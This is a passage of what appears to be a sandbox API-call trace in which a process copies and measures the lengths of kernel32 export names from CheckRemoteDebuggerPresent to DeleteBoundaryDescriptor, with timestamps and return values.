returned="CheckRemoteDebuggerPresent" [0049.324] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0049.324] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0049.324] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0049.324] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0049.324] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0049.324] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0049.324] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0049.324] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0049.324] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0049.324] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0049.324] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0049.325] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0049.325] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0049.325] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0049.325] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0049.325] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0049.325] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0049.325] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0049.325] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0049.325] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0049.325] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0049.325] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0049.325] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0049.325] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0049.325] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0049.325] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0049.325] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0049.325] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0049.325] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0049.325] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0049.325] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0049.326] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0049.326] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0049.326] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0049.326] lstrlenA (lpString="COPYCONTEXT") returned 11 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0049.326] lstrlenA (lpString="COPYFILEA") returned 9 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0049.326] lstrlenA (lpString="COPYFILEEXA") returned 11 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0049.326] lstrlenA (lpString="COPYFILEEXW") returned 11 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0049.326] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0049.326] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0049.326] lstrlenA (lpString="COPYFILEW") returned 9 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0049.326] lstrlenA (lpString="COPYLZFILE") returned 10 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0049.326] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0049.326] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0049.326] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0049.326] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0049.326] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0049.326] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0049.326] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0049.326] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0049.327] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0049.327] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0049.327] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0049.327] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0049.327] lstrlenA (lpString="CREATEEVENTA") returned 12 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0049.327] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0049.327] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0049.327] lstrlenA (lpString="CREATEEVENTW") returned 12 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0049.327] lstrlenA (lpString="CREATEFIBER") returned 11 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0049.327] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0049.327] lstrlenA (lpString="CREATEFILEA") returned 11 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0049.327] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0049.327] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0049.327] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0049.327] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0049.327] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0049.327] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0049.327] lstrlenA (lpString="CREATEFILEW") returned 11 [0049.327] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0049.328] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0049.328] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0049.328] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0049.328] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0049.328] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0049.328] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0049.328] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0049.328] lstrlenA (lpString="CREATEJOBSET") returned 12 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0049.328] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0049.328] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0049.328] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0049.328] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0049.328] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0049.328] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0049.328] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0049.328] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0049.328] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0049.328] lstrlenA (lpString="CREATEPIPE") returned 10 [0049.328] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0049.329] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0049.329] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0049.329] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0049.329] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0049.329] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0049.329] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0049.329] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0049.329] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0049.329] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0049.329] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0049.329] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0049.329] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0049.329] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0049.329] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0049.329] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0049.329] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0049.329] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0049.329] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0049.329] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0049.329] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0049.330] lstrlenA (lpString="CREATETHREAD") returned 12 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0049.330] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0049.330] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0049.330] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0049.330] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0049.330] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0049.330] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0049.330] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0049.330] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0049.330] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0049.330] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0049.330] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0049.330] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0049.330] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0049.330] lstrlenA (lpString="CTRLROUTINE") returned 11 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0049.330] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0049.330] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0049.330] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0049.330] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0049.331] lstrlenA (lpString="DEBUGBREAK") returned 10 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0049.331] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0049.331] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0049.331] lstrlenA (lpString="DECODEPOINTER") returned 13 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0049.331] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0049.331] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0049.331] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0049.331] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0049.331] lstrlenA (lpString="DELETEATOM") returned 10 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0049.331] lstrlenA 